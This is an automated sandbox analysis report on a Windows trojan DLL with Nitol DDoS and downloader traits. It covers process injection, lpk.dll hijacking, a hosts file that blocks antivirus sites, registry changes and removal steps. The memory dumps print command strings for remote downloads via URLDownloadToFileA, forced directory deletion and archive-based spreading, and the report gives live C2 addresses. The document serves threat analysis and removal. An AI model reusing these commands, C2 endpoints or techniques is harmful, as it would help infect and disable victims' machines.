HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.Generic.6278340 (B) (Emsisoft), Trojan.Generic.6278340 (AdAware), DDoS.Win32.Nitol.FD, Trojan.Win32.IEDummy.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR, GenericDownloader.YR, DDoSNitol.YR (Lavasoft MAS)Behaviour: Trojan, VirTool
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: ef50bb6aed4044c5b61d6642583ab769
SHA1: 41dd818e62e58081faa3f4b849874e6904bc3bb1
SHA256: 373190468904a0ea82cc76a7ce181b705942ae3785dd3107bbbfdf4e43181ee2
SSDeep: 768:MVCub7ChDTieMB9IqaoWuHnhmqUCai 4USlayHDojY9P7:927YDGl3Iq7WuHEqUExlayH2mj
Size: 50688 bytes
File type: DLL
Platform: WIN32
Entropy: Not Packed
PEID: BorlandDelphi30, UPolyXv05_v6
Company: Xacti, LLC
Created at: 2010-09-14 11:27:39
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676
The Trojan injects its code into the following process(es):
QQExtrenal.exe:1300
svchost.exe:432
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process mhrma.exe:1976 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\jarinet\QQExtrenal.exe (28 bytes)
The process regsvr32.exe:560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
The process QQExtrenal.exe:1300 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
The process hrl1.tmp:1676 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\iigmiy.exe (36 bytes)
Registry activity
The process taskkill.exe:1228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "66 DB 30 AE A5 DB 97 8D 99 E7 79 A3 DC B8 60 EC"
The process mhrma.exe:1976 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "04 0F 4D 4A 83 33 98 BD 1D A0 94 83 BD 6D DB F5"
The process lssaa.exe:1472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "90 51 E8 3A C0 50 D7 AF 2E 6C AA 0E 1C 21 B1 85"
The process regsvr32.exe:560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "BA EB 2F DE F5 35 81 8D EF 07 3A 9D E1 F4 AB 9D"
The process QQExtrenal.exe:1300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 BD 70 FB 9C CA 4E E1 C1 A5 7C DE 25 EE 8F 41"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
Proxy settings are disabled:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"
The process hrl1.tmp:1676 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C1 68 F3 49 6B FF 05 2B 7D 3A 1B 51 89 B7 28 66"
[HKLM\System\CurrentControlSet\Services\Nationalreo]
"Description" = "Providesfht a domain server for NI security."
Dropped PE files
MD5 | File path |
---|---|
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\All Users\Application Data\Adobe\Reader\9.3\ARM\lpk.dll |
2dfbee5818c733bfbceb52997356c3a6 | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\207023[1].exe |
547bca30fa2f34ae928845958e2dc73b | c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe |
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\Reader9\lpk.dll |
ca4f235951413d179b839ab4b772ef63 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\Adobe\Reader 9.3\Setup Files\lpk.dll |
ca4f235951413d179b839ab4b772ef63 | c:\Perl\bin\lpk.dll |
2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\Temp\mhrma.exe |
ca4f235951413d179b839ab4b772ef63 | c:\WINDOWS\system32\hra33.dll |
a0ead738be12651816b2d02ff16591ae | c:\WINDOWS\system32\iigmiy.exe |
2dfbee5818c733bfbceb52997356c3a6 | c:\WINDOWS\system32\jarinet\QQExtrenal.exe |
HOSTS file anomalies
The Trojan modifies "%System%\drivers\etc\hosts" file which is used to translate DNS entries to IP addresses. The modified file is 402 bytes in size. The following strings are added to the hosts file listed below:
127.0.0.1 | www.360.cn |
127.0.0.1 | www.kaspersky.com.cn |
127.0.0.1 | www.ijinshan.com |
127.0.0.1 | www.rising.com.cn |
127.0.0.1 | cn.trendmicro.com |
127.0.0.1 | www.symantec.com |
127.0.0.1 | sd.360.cn |
127.0.0.1 | www.eset.com.cn |
127.0.0.1 | www.avast.com |
127.0.0.1 | www.micropoint.com.cn |
127.0.0.1 | www.avira.com |
127.0.0.1 | www.avg.com |
127.0.0.1 | www.jiangmin.com |
127.0.0.1 | www.ggsafe.com |
127.0.0.1 | guanjia.qq.com |
Rootkit activity
No anomalies have been detected.
Propagation
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
taskkill.exe:1228
mhrma.exe:1976
lssaa.exe:1472
regsvr32.exe:560
hrl1.tmp:1676 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%System%\jarinet\QQExtrenal.exe (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\hrl1.tmp (36 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\lssaa[1].exe (7921 bytes)
%WinDir%\inf\lssaa.exe (45 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\down[1].txt (173 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\zzd[1].exe (3849 bytes)
%System%\drivers\etc\hosts (898 bytes)
%System%\iigmiy.exe (36 bytes) - Restore the original content of the HOSTS file (%System%\drivers\etc\hosts): 127.0.0.1 localhost
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
Static Analysis
VersionInfo
No information is available.
No information is available.
PE Sections
Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
---|---|---|---|---|---|
.text | 4096 | 4853 | 5120 | 4.22182 | 56a4660d1dce36d81c7173fe2bdaa8da |
.rdata | 12288 | 2617 | 3072 | 3.09371 | c375b8bfb64c0a66ffa8284e48d9e40a |
.data | 16384 | 1500 | 512 | 0.112976 | 0b2e7741e0c0fc65af1542e370d89f53 |
.CRT | 20480 | 4 | 512 | 0.042395 | dcbbf4e61fb806ed312aaf3c094dc153 |
.rsrc | 24576 | 39228 | 39424 | 4.02044 | 95b22bf3bdd3071cfc5a4f787b88c49f |
.reloc | 65536 | 700 | 1024 | 2.971 | 9c7cbab195c7f30b2d2a7924e5a5dc92 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
URL | IP |
---|---|
hxxp://192.240.107.44/toopu2.png | |
www.mojimojimojimoji.com | 198.15.148.34 |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /toopu2.png HTTP/1.1
Accept: */*
Referer:
Accept-Language: zh-cn
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50215)
Host: 192.240.107.44
Connection: Keep-Alive
Cookie:
HTTP/1.1 200 OK
Content-Type: image/png
Last-Modified: Thu, 28 Apr 2016 03:24:07 GMT
Accept-Ranges: bytes
ETag: "9c2a476cfda0d11:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 30 May 2016 22:15:32 GMT
Content-Length: 286377
.PNG........IHDR...9...9.......s.....tEXtSoftware.Adobe ImageReadyq.e<... iTXtXML:com.adobe.xmp.....<?xpacket begin="..." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00 "> <rdf:RDF xmlns:rdf="hXXp://VVV.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="hXXp://ns.adobe.com/xap/1.0/" xmlns:xmpMM="hXXp://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS5 Windows" xmpMM:InstanceID="xmp.iid:967CD4C7D4E611E39675E1BAB4918499" xmpMM:DocumentID="xmp.did:967CD4C8D4E611E39675E1BAB4918499"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:967CD4C5D4E611E39675E1BAB4918499" stRef:documentID="xmp.did:967CD4C6D4E611E39675E1BAB4918499"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>uU.~....PLTE........e..$.....W..l..}ygH.....!....X............z...vkW.........|uk......................j;...........^.......x......#.wF.kE.{&..G........1.v5....z......T..K..*....rY....h&...UG...U.................~........7..J....n.lF...C....xd..2..{..:yc<..(.k(.v...~.t.....l.lM.wY'...........,.}......@........C..Y.......qD..q.....N.....~...wR.R;.zS............y..93*.....y.....|c.u.lT*...f[I........j....{s..]..X...........B.....&.....j..M..........z^.qQZA..~......9...........T.............v`......kX9.....C...mg^.....5.z...xzo\...yI......St^9.~...J.g............{............^UF..........^!....
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
regsvr32.exe_560:
.text
.text
`.data
`.data
.rsrc
.rsrc
msvcrt.dll
msvcrt.dll
ADVAPI32.dll
ADVAPI32.dll
KERNEL32.dll
KERNEL32.dll
NTDLL.DLL
NTDLL.DLL
USER32.dll
USER32.dll
ole32.dll
ole32.dll
regsvr32.pdb
regsvr32.pdb
_wcmdln
_wcmdln
RegCloseKey
RegCloseKey
RegOpenKeyExW
RegOpenKeyExW
Excessive # of DLL's on cmdline
Excessive # of DLL's on cmdline
5.1.2600.5512 (xpsp.080413-2105)
5.1.2600.5512 (xpsp.080413-2105)
REGSVR32.EXE
REGSVR32.EXE
Windows
Windows
Operating System
Operating System
5.1.2600.5512
5.1.2600.5512
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Usage: regsvr32 [/u] [/s] [/n] [/i[:cmdline]] dllname
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Call DllInstall passing it an optional [cmdline]; when used with /u calls dll uninstall
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
Unrecognized flag: %1"Extra argument on command line: This command is only valid when an OLE Custom Control project is open.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
LoadLibrary("%1") failed - ,%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
%1 does not appear to be a .DLL or .OCX file.V%1 was loaded, but the %2 entry point was not found.
OleUninitialize failed.["%1" is not an executable file and no registration
OleUninitialize failed.["%1" is not an executable file and no registration
svchost.exe_432:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
0.0.0.0
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/testq.html
hXXp://VVV.mojimojimojimoji.com/testq.html
VVV.mojimojimojimoji.com:8088
VVV.mojimojimojimoji.com:8088
%u.%u.%u.%u
%u.%u.%u.%u
hra%u.dll
hra%u.dll
iexplore.exe
iexplore.exe
stf%c%c%c%c%c.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
%c%c%c%c%c.exe
%c%c%c%c%c.exe
PlusCtrl.dll
PlusCtrl.dll
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe
%u MB
%u MB
%u MHz
%u MHz
Windows NT
Windows NT
Windows 7
Windows 7
Windows 2008
Windows 2008
Windows Vista
Windows Vista
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
\Program Files\Internet Explorer\iexplore.exe
#0%s!
#0%s!
%s/%s
%s/%s
GET %s HTTP/1.1
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s:%d
Host: %s
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
%d.%d.%d.%d
192.168.1.244
192.168.1.244
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
@.reloc
@.reloc
lpk.dll
lpk.dll
cmd /c RD /s /q "%s"
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
rar.exe
svchost.exe_432_rwx_00400000_0000C000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.rsrc
.rsrc
ADVAPI32.dll
ADVAPI32.dll
USER32.dll
USER32.dll
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
GET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htmGET ^&&%$%$^%$#^&**(*((&*^%$##$%^&*(*&^%$%^&*.htm
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
RegOpenKeyA
RegOpenKeyA
SHLWAPI.dll
SHLWAPI.dll
ShellExecuteA
ShellExecuteA
SHELL32.dll
SHELL32.dll
WS2_32.dll
WS2_32.dll
MSVCRT.dll
MSVCRT.dll
_acmdln
_acmdln
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
0.0.0.0
0.0.0.0
hXXp://VVV.mojimojimojimoji.com/testq.html
hXXp://VVV.mojimojimojimoji.com/testq.html
VVV.mojimojimojimoji.com:8088
VVV.mojimojimojimoji.com:8088
%u.%u.%u.%u
%u.%u.%u.%u
hra%u.dll
hra%u.dll
iexplore.exe
iexplore.exe
stf%c%c%c%c%c.exe
stf%c%c%c%c%c.exe
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
%c%c%c%c%c.exe
%c%c%c%c%c.exe
PlusCtrl.dll
PlusCtrl.dll
%c%c%c%c%c%c.exe
%c%c%c%c%c%c.exe
%u MB
%u MB
%u MHz
%u MHz
Windows NT
Windows NT
Windows 7
Windows 7
Windows 2008
Windows 2008
Windows Vista
Windows Vista
Windows 2003
Windows 2003
Windows XP
Windows XP
Windows 2000
Windows 2000
SOFTWARE\Microsoft\Windows NT\CurrentVersion
SOFTWARE\Microsoft\Windows NT\CurrentVersion
\Program Files\Internet Explorer\iexplore.exe
\Program Files\Internet Explorer\iexplore.exe
#0%s!
#0%s!
%s/%s
%s/%s
GET %s HTTP/1.1
GET %s HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s:%d
Host: %s
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
%d.%d.%d.%d
192.168.1.244
192.168.1.244
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
@.reloc
@.reloc
lpk.dll
lpk.dll
cmd /c RD /s /q "%s"
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
rar.exe
QQExtrenal.exe_1300:
.text
.text
`.data
